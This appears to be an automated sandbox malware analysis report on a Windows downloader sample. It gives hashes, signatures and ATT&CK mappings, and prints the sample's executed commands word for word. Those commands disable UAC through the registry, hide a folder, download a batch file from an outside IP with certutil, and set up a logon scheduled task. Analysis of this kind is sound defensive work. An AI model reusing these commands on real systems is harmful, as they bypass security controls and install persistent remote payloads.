Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
20/04/2024, 11:56
Static task
static1
Behavioral task
behavioral1
Sample
av_downloader.exe
Resource
win7-20240220-en
General
-
Target
av_downloader.exe
-
Size
90KB
-
MD5
8af4f985862c71682e796dcc912f27dc
-
SHA1
7f83117abfeff070d41d8144cf1dfe3af8607d27
-
SHA256
d925204430ffab51ffbbb9dc90bc224b04f0c2196769850695512245a886be06
-
SHA512
3d4fcd9755dc4ea005fcd46e78426c5f71b50873c5174a69abcdff41a2e0405c87a36137c0c2409abedadb0ecdf622cbfd2fa1b59a2e06c81cef68d7c6c663b7
-
SSDEEP
1536:v7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfnweJbOC:D7DhdC6kzWypvaQ0FxyNTBfnBV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2556 attrib.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2800 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1656 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2172 wrote to memory of 1056 2172 av_downloader.exe 29 PID 2172 wrote to memory of 1056 2172 av_downloader.exe 29 PID 2172 wrote to memory of 1056 2172 av_downloader.exe 29 PID 2172 wrote to memory of 1056 2172 av_downloader.exe 29 PID 1056 wrote to memory of 2948 1056 cmd.exe 30 PID 1056 wrote to memory of 2948 1056 cmd.exe 30 PID 1056 wrote to memory of 2948 1056 cmd.exe 30 PID 2948 wrote to memory of 2612 2948 mshta.exe 31 PID 2948 wrote to memory of 2612 2948 mshta.exe 31 PID 2948 wrote to memory of 2612 2948 mshta.exe 31 PID 2948 wrote to memory of 2612 2948 mshta.exe 31 PID 2612 wrote to memory of 2600 2612 AV_DOW~1.EXE 33 PID 2612 wrote to memory of 2600 2612 AV_DOW~1.EXE 33 PID 2612 wrote to memory of 2600 2612 AV_DOW~1.EXE 33 PID 2612 wrote to memory of 2600 2612 AV_DOW~1.EXE 33 PID 2600 wrote to memory of 2664 2600 cmd.exe 34 PID 2600 wrote to memory of 2664 2600 cmd.exe 34 PID 2600 wrote to memory of 2664 2600 cmd.exe 34 PID 2600 wrote to memory of 2664 2600 cmd.exe 34 PID 2600 wrote to memory of 2648 2600 cmd.exe 35 PID 2600 wrote to memory of 2648 2600 cmd.exe 35 PID 2600 wrote to memory of 2648 2600 cmd.exe 35 PID 2600 wrote to memory of 2648 2600 cmd.exe 35 PID 2600 wrote to memory of 2672 2600 cmd.exe 36 PID 2600 wrote to memory of 2672 2600 cmd.exe 36 PID 2600 wrote to memory of 2672 2600 cmd.exe 36 PID 2600 wrote to memory of 2672 2600 cmd.exe 36 PID 2600 wrote to memory of 2556 2600 cmd.exe 37 PID 2600 wrote to memory of 2556 2600 cmd.exe 37 PID 2600 wrote to memory of 2556 2600 cmd.exe 37 PID 2600 wrote to memory of 2556 2600 cmd.exe 37 PID 2600 wrote to memory of 2660 2600 cmd.exe 38 PID 2600 wrote to memory of 2660 2600 cmd.exe 38 PID 2600 wrote to memory of 2660 2600 cmd.exe 38 PID 2600 wrote to memory of 2660 2600 cmd.exe 38 PID 2600 wrote to memory of 2784 2600 cmd.exe 39 PID 2600 wrote to memory of 2784 2600 cmd.exe 39 PID 2600 wrote to memory of 2784 2600 cmd.exe 39 PID 2600 wrote to memory of 2784 2600 cmd.exe 39 PID 2600 wrote to memory of 2800 2600 cmd.exe 40 PID 2600 wrote to memory of 2800 2600 cmd.exe 40 PID 2600 wrote to memory of 2800 2600 cmd.exe 40 PID 2600 wrote to memory of 2800 2600 cmd.exe 40 PID 2600 wrote to memory of 1656 2600 cmd.exe 41 PID 2600 wrote to memory of 1656 2600 cmd.exe 41 PID 2600 wrote to memory of 1656 2600 cmd.exe 41 PID 2600 wrote to memory of 1656 2600 cmd.exe 41 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2556 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.tmp\19E9.bat C:\Users\Admin\AppData\Local\Temp\av_downloader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target4⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1AE0.tmp\1AE1.tmp\1AE2.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"5⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2664
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2648
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2672
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h e:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2556
-
-
C:\Windows\SysWOW64\certutil.execertutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat6⤵PID:2660
-
-
C:\Windows\SysWOW64\certutil.execertutil -urlcache * delete6⤵PID:2784
-
-
C:\Windows\SysWOW64\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f6⤵
- Creates scheduled task(s)
PID:2800
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1006⤵
- Delays execution with timeout.exe
PID:1656
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ce802b6e8add0c59b4c1ceea614bafa3
SHA106bfafde5c85d2ea230ebccf8db6f0d9e39520a1
SHA256419010826148482cca4ad662fdbdc8eac445b4b6181e4a1f4b62d7eb7783f4e2
SHA5128acd430a20f444bd2fc45b059805cb608d19e95edd60576340dcbce99072e6e58be43fc0bd61c031698279c964f748ffebf01ef94a7c7e90f02b2b0f041fe6e8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D91B1967EF3D6973EA9AE658EC3C1C5D
Filesize248B
MD5cfb7e784f71f38f832bf229dd089caa5
SHA10af0c4ed8ad6b7561e5088186d57133bb0b1d710
SHA256fde43a8cbed55ed2accba41d7b9baca977e2912810e9f2773e66095e2310b9a0
SHA5124fe41f8af32e0d9e60e25323ac849bc5ce25a6ffe0ae77e8cc8c6f2d1e7e9dc011cdc52c91db92948ff956334a48d14e4a1206c25de49e2d107b4147e0172823
-
Filesize
965B
MD5db5421114f689cfb1c82edf49fddd7a4
SHA1a1987cfe0b38bdac3fe75bae72137463a0843fac
SHA256edb8e629e2c5ae4498d0f00cb4540f185cf6136ba11898a542d2fdd34394379a
SHA5126eaf5f71787046951ffc1fe98c3fdae7dd5a36214cf4971146a94d200bbf2037a8f87e1afa81e05b2d34083d298b0254ac23d2b2e518b6e75fab38e5ca376281